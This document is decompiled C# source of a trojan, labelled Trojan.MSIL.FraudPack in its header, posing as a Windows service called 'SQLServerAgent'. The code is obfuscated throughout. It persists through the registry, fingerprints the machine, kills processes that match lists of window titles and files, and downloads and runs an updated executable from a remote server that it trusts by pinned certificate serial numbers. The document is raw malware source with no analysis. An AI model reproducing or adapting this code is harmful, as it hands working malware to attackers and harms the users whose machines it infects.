// Decompiled with JetBrains decompiler // Type:  // Assembly: SQLServerAgent, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 64EBCD24-503A-45A7-A91C-C993E34BC26D // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.FraudPack.n-de20bb9e8ee4dc179396f640788292cd44dfb1b4244b6a8b5daa6ee32ee2733e.exe using Microsoft.Win32; using System; using System.ComponentModel; using System.Diagnostics; using System.IO; using System.Management; using System.Net; using System.Security.Cryptography; using System.Security.Cryptography.X509Certificates; using System.ServiceProcess; using System.Text; using System.Threading; using System.Timers; public sealed class \u0005 : ServiceBase { private string \u0002; private bool \u0003 = false; private bool \u0005 = false; private string \u0008; private string \u0006; private string \u000E; private string \u000F; private int \u0002\u2000; private string \u0003\u2000 = string.Empty; private bool \u0005\u2000 = false; private System.Timers.Timer \u0008\u2000 = new System.Timers.Timer(30000.0); private IContainer \u0006\u2000 = (IContainer) null; private BackgroundWorker \u000E\u2000; private BackgroundWorker \u000F\u2000; public \u0005() => this.\u000E(); protected override void OnStart(string[] _param1) { this.\u0008(); this.\u0002(); this.\u0002 = \u0005.\u0002(); this.\u0003(); this.\u0005(); RegistryKey subKey = Registry.LocalMachine.CreateSubKey(\u0008.\u0002(1356208489), RegistryKeyPermissionCheck.ReadWriteSubTree); this.\u0002\u2000 = (int) subKey.GetValue(\u0008.\u0002(1356208422)); subKey.Close(); System.Timers.Timer timer1 = new System.Timers.Timer(1000.0); timer1.Elapsed += new ElapsedEventHandler(this.\u0005); timer1.AutoReset = true; timer1.Enabled = true; this.\u0008\u2000.Elapsed += new ElapsedEventHandler(this.\u0003); this.\u0008\u2000.AutoReset = true; this.\u0008\u2000.Enabled = false; System.Timers.Timer timer2 = new System.Timers.Timer(60000.0); timer2.Elapsed += new ElapsedEventHandler(this.\u0002); timer2.AutoReset = true; timer2.Enabled = true; } private void \u0002() { try { this.\u0002(\u0008.\u0002(1356208433)); RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(\u0008.\u0002(1356208444), RegistryKeyPermissionCheck.ReadWriteSubTree); registryKey.DeleteValue(\u0008.\u0002(1356208433)); registryKey.Close(); System.IO.File.Delete(Convert.ToString(Path.GetPathRoot(Environment.SystemDirectory)[0]) + \u0008.\u0002(1356208368)); } catch { } } private void \u0002(object _param1, ElapsedEventArgs _param2) { if (this.\u0005\u2000) return; this.\u0005(); } private string \u0002(string _param1) { if (!System.IO.File.Exists(_param1)) return string.Empty; StringBuilder stringBuilder = new StringBuilder(); try { FileStream inputStream = new FileStream(_param1, FileMode.Open, FileAccess.Read, FileShare.ReadWrite); byte[] hash = new MD5CryptoServiceProvider().ComputeHash((Stream) inputStream); inputStream.Close(); for (int index = 0; index < hash.Length; ++index) stringBuilder.Append(hash[index].ToString(\u0008.\u0002(1356208348))); } catch { return string.Empty; } return stringBuilder.ToString(); } private void \u0003() { try { this.\u0008 = this.\u0003(\u0008.\u0002(1356208293) + this.\u0003\u2000 + \u0008.\u0002(1356208257)).Split('-')[0]; } catch { } } private void \u0005() => this.\u000E = this.\u0002(Convert.ToString(Path.GetPathRoot(Environment.SystemDirectory)[0]) + \u0008.\u0002(1356208275)); private static string \u0002() { string empty = string.Empty; foreach (ManagementObject instance in new ManagementClass(\u0008.\u0002(1356208197)).GetInstances()) { if (empty == string.Empty) { empty = instance.Properties[\u0008.\u0002(1356208219)].Value.ToString(); break; } } string str1 = Convert.ToString(Path.GetPathRoot(Environment.SystemDirectory)[0]); ManagementObject managementObject = new ManagementObject(\u0008.\u0002(1356208173) + str1 + \u0008.\u0002(1356208144)); managementObject.Get(); string str2 = managementObject[\u0008.\u0002(1356208153)].ToString(); byte[] hash = MD5.Create().ComputeHash(Encoding.Default.GetBytes(empty + str2)); StringBuilder stringBuilder = new StringBuilder(); for (int index = 0; index < hash.Length; ++index) stringBuilder.Append(hash[index].ToString(\u0008.\u0002(1356208348))); return stringBuilder.ToString(); } private string \u0003(string _param1) { try { ServicePointManager.CertificatePolicy = (ICertificatePolicy) new \u0005.\u0002(); StringBuilder stringBuilder = new StringBuilder(); byte[] numArray = new byte[8192]; Stream responseStream = WebRequest.Create(_param1).GetResponse().GetResponseStream(); int count; do { count = responseStream.Read(numArray, 0, numArray.Length); if (count != 0) { string str = Encoding.ASCII.GetString(numArray, 0, count); stringBuilder.Append(str); } } while (count > 0); responseStream.Flush(); return stringBuilder.ToString(); } catch { return _param1.IndexOf(\u0008.\u0002(1356208293)) != -1 ? this.\u0003(_param1.Replace(\u0008.\u0002(1356209138), \u0008.\u0002(1356209101))) : string.Empty; } } private void \u0002(string _param1) { foreach (Process process in Process.GetProcessesByName(_param1)) process.Kill(); } private void \u0008() { try { if (!System.IO.File.Exists(\u0008.\u0002(1356209061))) return; this.\u0003\u2000 = \u0008.\u0002(1356209033); } catch { } } private string \u0002() { TextReader textReader = (TextReader) new StreamReader(\u0008.\u0002(1356209041)); string end = textReader.ReadToEnd(); textReader.Close(); return end; } private bool \u0002(string _param1, string _param2) { TextWriter textWriter = (TextWriter) new StreamWriter(\u0008.\u0002(1356209003) + _param1 + \u0008.\u0002(1356209013)); textWriter.WriteLine(_param2); textWriter.Close(); return true; } private bool \u0003(string _param1, string _param2) { try { ServicePointManager.CertificatePolicy = (ICertificatePolicy) new \u0005.\u0002(); byte[] buffer = new byte[8192]; Stream responseStream = WebRequest.Create(_param1).GetResponse().GetResponseStream(); FileStream output = new FileStream(_param2, FileMode.OpenOrCreate); BinaryWriter binaryWriter = new BinaryWriter((Stream) output); int count; do { count = responseStream.Read(buffer, 0, buffer.Length); if (count != 0) binaryWriter.Write(buffer, 0, count); } while (count > 0); responseStream.Flush(); binaryWriter.Close(); output.Close(); return true; } catch { return _param1.IndexOf(\u0008.\u0002(1356208293)) != -1 && this.\u0003(_param1.Replace(\u0008.\u0002(1356209138), \u0008.\u0002(1356208960)), _param2); } } private void \u0006() { if (this.\u0008 != this.\u000E || this.\u0008 == string.Empty) this.\u0003(); if (!(this.\u0008 != this.\u000E) || !(this.\u0008 != string.Empty)) return; this.\u0003 = true; string tempPath = Path.GetTempPath(); this.\u000E\u2000.RunWorkerAsync((object) new string[2] { \u0008.\u0002(1356208985) + this.\u0003\u2000 + \u0008.\u0002(1356208948), tempPath + \u0008.\u0002(1356208920) }); } public void \u0005\u2004\u2006\u2009\u2001\u2009\u2009\u2004\u2001\u2001\u2003\u2001\u2008\u2008\u2003\u200A\u2001() { string[] strArray1 = new string[1] { \u0008.\u0002(1356208871) }; string[] strArray2 = new string[2] { \u0008.\u0002(1356208892), \u0008.\u0002(1356208846) }; string[] strArray3 = new string[2] { \u0008.\u0002(1356208800), \u0008.\u0002(1356208815) }; string[] strArray4 = new string[1] { \u0008.\u0002(1356208772) }; string[] strArray5 = new string[1] { \u0008.\u0002(1356208795) }; string[] strArray6 = new string[1] { \u0008.\u0002(1356208758) }; string[] strArray7 = new string[2] { \u0008.\u0002(1356208719), \u0008.\u0002(1356208735) }; string[] strArray8 = new string[2] { \u0008.\u0002(1356208719), \u0008.\u0002(1356208688) }; string[] strArray9 = new string[3] { \u0008.\u0002(1356208640), \u0008.\u0002(1356208655), \u0008.\u0002(1356208670) }; string[][] strArray10 = new string[10][] { strArray1, strArray2, strArray3, strArray4, strArray5, strArray6, strArray7, strArray8, strArray9, strArray1 }; foreach (Process process in Process.GetProcesses()) { try { string directoryName = Path.GetDirectoryName(process.MainModule.FileName); string fileName = Path.GetFileName(process.MainModule.FileName); string mainWindowTitle = process.MainWindowTitle; if (mainWindowTitle.IndexOf(\u0008.\u0002(1356209645)) != -1 || mainWindowTitle.IndexOf(\u0008.\u0002(1356209661)) != -1 || fileName.IndexOf(\u0008.\u0002(1356209614)) != -1) { process.Kill(); } else { for (int index1 = 0; index1 < strArray10.Length; ++index1) { string[] strArray11 = strArray10[index1]; bool flag = true; for (int index2 = 0; index2 < strArray11.Length; ++index2) { string str = strArray11[index2]; if (!System.IO.File.Exists(directoryName + \u0008.\u0002(1356209568) + str)) { flag = false; break; } } if (flag) { process.Kill(); break; } } } } catch { } } } private bool \u0002() { string str = Convert.ToString(Path.GetPathRoot(Environment.SystemDirectory)[0]); Process[] processesByName = Process.GetProcessesByName(\u0008.\u0002(1356209576)); bool flag = false; for (int index = 0; index < processesByName.Length; ++index) { if (processesByName[index].MainModule.FileName != str + \u0008.\u0002(1356208275)) processesByName[index].Kill(); else if (processesByName[index].MainWindowHandle.ToInt32() != 0) flag = true; else processesByName[index].Kill(); } return flag; } private void \u0003(object _param1, ElapsedEventArgs _param2) { this.\u0005\u2000 = false; this.\u0008\u2000.Enabled = false; } private void \u0005(object _param1, ElapsedEventArgs _param2) { string str = Convert.ToString(Path.GetPathRoot(Environment.SystemDirectory)[0]); if (System.IO.File.Exists(str + \u0008.\u0002(1356209593))) { try { System.IO.File.Delete(str + \u0008.\u0002(1356209593)); } catch { } this.\u0002(\u0008.\u0002(1356208433)); this.\u0005\u2000 = true; this.\u0008\u2000.Enabled = true; } if (this.\u0005\u2000) return; RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(\u0008.\u0002(1356208444), RegistryKeyPermissionCheck.ReadWriteSubTree); string empty1 = string.Empty; string empty2 = string.Empty; try { empty1 = (string) registryKey.GetValue(\u0008.\u0002(1356209512)); } catch { } try { if (empty1 != str + \u0008.\u0002(1356208275)) { registryKey.CreateSubKey(\u0008.\u0002(1356209512)); registryKey.SetValue(\u0008.\u0002(1356209512), (object) (str + \u0008.\u0002(1356208275))); } } catch { } registryKey.Close(); if (this.\u0003) return; this.\u0006(); if (this.\u0003) return; Process[] processesByName = Process.GetProcessesByName(\u0008.\u0002(1356209576)); bool flag = false; for (int index = 0; index < processesByName.Length; ++index) { if (processesByName[index].MainModule.FileName != str + \u0008.\u0002(1356208275)) processesByName[index].Kill(); else flag = true; } if (flag) return; try { Process.Start(str + \u0008.\u0002(1356208275)); } catch { } } protected override void OnStop() { } private void \u0002(object _param1, DoWorkEventArgs _param2) { } private void \u0003(object _param1, DoWorkEventArgs _param2) { string[] strArray = (string[]) _param2.Argument; string str1 = strArray[0]; string sourceFileName = strArray[1]; if (this.\u0003(str1, sourceFileName)) { Path.GetTempPath(); string str2 = Convert.ToString(Path.GetPathRoot(Environment.SystemDirectory)[0]); this.\u0002(\u0008.\u0002(1356208433)); this.\u0002(\u0008.\u0002(1356209576)); Thread.Sleep(3000); try { if (System.IO.File.Exists(str2 + \u0008.\u0002(1356208275))) System.IO.File.Delete(str2 + \u0008.\u0002(1356208275)); if (!Directory.Exists(str2 + \u0008.\u0002(1356209527))) Directory.CreateDirectory(str2 + \u0008.\u0002(1356209527)); System.IO.File.Move(sourceFileName, str2 + \u0008.\u0002(1356208275)); } catch { } this.\u000E = this.\u0008; } this.\u0003 = false; } private void \u0005(object _param1, DoWorkEventArgs _param2) { } protected override void Dispose(bool _param1) { if (_param1 && this.\u0006\u2000 != null) this.\u0006\u2000.Dispose(); base.Dispose(_param1); } private void \u000E() { this.\u000E\u2000 = new BackgroundWorker(); this.\u000F\u2000 = new BackgroundWorker(); this.\u000E\u2000.DoWork += new DoWorkEventHandler(this.\u0003); this.\u000F\u2000.DoWork += new DoWorkEventHandler(this.\u0005); this.ServiceName = \u0008.\u0002(1356208604); } public sealed class \u0002 : ICertificatePolicy { public bool CheckValidationResult( ServicePoint _param1, X509Certificate _param2, WebRequest _param3, int _param4) { string serialNumberString = _param2.GetSerialNumberString(); return !(serialNumberString != \u0008.\u0002(1356208567)) || !(serialNumberString != \u0008.\u0002(1356208528)); } } }